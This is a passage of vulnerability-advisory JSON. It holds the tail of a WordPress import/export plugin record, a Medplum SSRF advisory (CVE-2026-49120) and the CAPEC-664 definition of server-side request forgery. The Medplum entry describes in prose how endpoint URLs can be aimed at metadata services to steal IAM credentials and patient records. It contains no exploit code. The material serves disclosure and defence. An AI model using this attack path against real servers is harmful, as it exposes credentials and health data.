"url": "https://plugins.trac.wordpress.org/browser/wp-import-export-lite/tags/3.9.30/includes/classes/import/downloader/download.php#L31"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/wp-import-export-lite/tags/3.9.30/includes/classes/import/downloader/download.php#L97"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/wp-import-export-lite/tags/3.9.30/includes/classes/import/extensions/url-upload/class-wpie-url-upload.php#L29"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/wp-import-export-lite/tags/3.9.30/includes/classes/import/extensions/url-upload/wpie_url_upload.php#L44"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/wp-import-export-lite/trunk/includes/classes/import/downloader/download.php?rev=3587811"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/94384812-fa6e-48db-a84a-b1769e62ca58?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-W852-7R27-32C6
Vulnerability from github – Published: 2026-06-02 21:30 – Updated: 2026-06-02 21:30Medplum before 5.1.14 contains a server-side request forgery vulnerability in the subscription worker that allows authenticated users to perform unauthorized internal network requests by creating FHIR Subscription resources with arbitrary endpoint URLs. Attackers can point subscription endpoints at internal addresses such as cloud instance metadata services, internal databases, or container orchestration endpoints to exfiltrate IAM credentials and patient health records via the POST body containing full FHIR resource payloads.
{
"affected": [],
"aliases": [
"CVE-2026-49120"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-06-02T20:16:39Z",
"severity": "MODERATE"
},
"details": "Medplum before 5.1.14 contains a server-side request forgery vulnerability in the subscription worker that allows authenticated users to perform unauthorized internal network requests by creating FHIR Subscription resources with arbitrary endpoint URLs. Attackers can point subscription endpoints at internal addresses such as cloud instance metadata services, internal databases, or container orchestration endpoints to exfiltrate IAM credentials and patient health records via the POST body containing full FHIR resource payloads.",
"id": "GHSA-w852-7r27-32c6",
"modified": "2026-06-02T21:30:43Z",
"published": "2026-06-02T21:30:43Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-49120"
},
{
"type": "WEB",
"url": "https://github.com/medplum/medplum/pull/9334"
},
{
"type": "WEB",
"url": "https://github.com/medplum/medplum/commit/87595e98d756d840d70d9dc87beb9d4f9e158b59"
},
{
"type": "WEB",
"url": "https://github.com/medplum/medplum/releases/tag/v5.1.14"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/medplum-ssrf-via-fhir-subscription-endpoint"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
No mitigation information available for this CWE.
CAPEC-664: Server Side Request Forgery
An adversary exploits improper input validation by submitting maliciously crafted input to a target application running on a server, with the goal of forcing the server to make a request either to itself, to web services running in the server’s internal network, or to external third parties. If successful, the adversary’s request will be made with the server’s privilege level, bypassing its authentication controls. This ultimately allows the adversary to access sensitive data, execute commands on the server’s network, and make external requests with the stolen identity of the server. Server Side Request Forgery attacks differ from Cross Site Request Forgery attacks in that they target the server itself, whereas CSRF attacks exploit an insecure user authentication mechanism to perform unauthorized actions on the user's behalf.